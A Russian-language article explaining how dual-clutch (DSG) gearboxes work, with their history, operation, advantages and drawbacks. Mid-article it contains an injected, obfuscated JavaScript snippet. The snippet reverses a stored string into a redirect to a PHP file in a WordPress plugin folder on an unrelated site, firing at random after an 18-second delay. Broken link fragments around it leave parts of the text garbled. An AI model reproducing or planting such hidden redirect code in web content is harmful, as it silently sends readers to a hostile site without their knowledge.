
Двойное сцепление: совакупность достоинств механики и автомата
Бьюсь об заклад, процентов 90 из вас, прочитав заголовок этой статьи, подумает: «двойное сцепление что это»?
Не стыдитесь, большинство механиков в любом автосервисе не сразу сможет объяснить вам что это и как оно работает.
Но на самом деле ничего сложного в принципе работы этого механизма нет, а если вы внимательно ознакомитесь с этой статьей, то убедитесь в этом.
Оглавление
Историческая справка
Устройство перекочевало в конвейерное производство автомобилей со спортивных треков. Первый прототип появился в 1939 году. Его автор Адольф Кегресс, планировал установить его на Citroen Traction. Однако дальше чертежей дело не пошло.
И лишь в конце прошлого века компания Porsche создала КПП, которая переключала передачи без сбрасывания газа.
Если ранее при переключении передач форсированные моторы теряли мощность, в результате сброса газа, то система с двойным сцеплением обеспечивала переключение передач без снижения мощности крутящего момента.
Как устроено двойное сцепление
Главная суть изобретения, это использование в работе сцепления обоих (двух) валов коробки передач.
Если в обычном механическом варианте шестерни установлены на одном валу, то тут первое сцепление транслирует крутящий момент на внешний вал (для четных передач), а второе – на внутренний (для нечетных передач).
Другими словами, в корпусе как бы размещены две механические коробки, которые работают попеременно.
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/avtomaticheskaya-korobka-peredach.html» target=»_blank» rel=»noopener noreferrer»>автоматической коробки передач, в КП, имеющих двойное сцепление, нет гидротрансформатора. Есть варианты с «мокрым» двойным сцеплением (детали работают в смазочно-охлаждающей жидкости) и обычные, сухие.
Вообще, мнение специалистов сходится в том, что система DSG (Direct Shift Gearbox) самая лучшая для сухого двойного сцепления.
Принцип работы сухого двойного сцепления
В момент начала движения на первой передаче, автоматика начинает готовить вторую. В момент переключения первое сцепление выключается, а второе – включается.
После чего автоматика определяет, что авто разгоняется дальше и начинает готовить третью, и далее по такому же алгоритму.
Для определения следующей передачи автоматика учитывает:
- положение педали газа (зависит от того разгоняется автомобиль или тормозит);
- скорость вращения первого вала или второго;
- угловые скорости вращение колес;
- расположение рычага переключения КП.
Во время переключения на какие-то доли секунды первое и второе сцепления становятся замкнутыми.
В результате этого мотор остается соединенным с ведущими колесами и крутящий момент фактически не снижается.
Плюсы и минусы
Надо отдать должное конструкторам этого гениального изобретения. Такое сцепление дает удивительную плавность хода транспортного средства, переключение передач без рывков и дерганий. А по сути дела это же ведь механическая коробка передач.
Не зря авто концерн Volkswagen сделал основную ставку на такого рода коробки переключения передач и постоянно их совершенствует.
Единственный существенный недостаток – это масса сложных элементов, и соответственно это отражается на ценах на ремонт и обслуживание.
Плюсы
- Экономия горючего. По сравнению с 5-ти ступенчатой автоматической КПП вариант с двумя сцеплениями расходует на 10 процентов меньше горючего;
- Плавный ход и отсутствие рывков при переключении передач;
- Отличная динамика – линейное ускорение без заметных потерь мощности;
- Вариативность переключения передач – самостоятельно или на автомате;
- Оптимальный вариант для мощных авто с двигателями на 200 – 500 л. с.
Минусы
- Профессиональное сервисное обслуживание только в больших городах;
- Сложная конструкция, и, следовательно, дорогое обслуживание и ремонт;
- «Рывки» и «провалы» в процессе движения в спортивном режиме с постоянными торможениями и разгонами. При использовании такого стиля езды автоматика требует 400 — 600 миллисекунд, чтобы успеть определить передачу, на которую необходимо переключиться.
Коробки переключения передач с двойными сцеплением объединили все достоинства «to-takoe-mehanicheskaya-korobka-peredach.html» target=»_blank» rel=»noopener noreferrer»>механики» и «tomaticheskaya-korobka-peredach.html» target=»_blank» rel=»noopener noreferrer»>автомата»: малый расход горючего, плавность хода, удобство управления.
Все ведущие автопроизводители уже используют системы двойного сцепления на своих моделях, в этом будущее. Их распространение сдерживает лишь значительная себестоимость и опасения в среде потенциальных покупателей.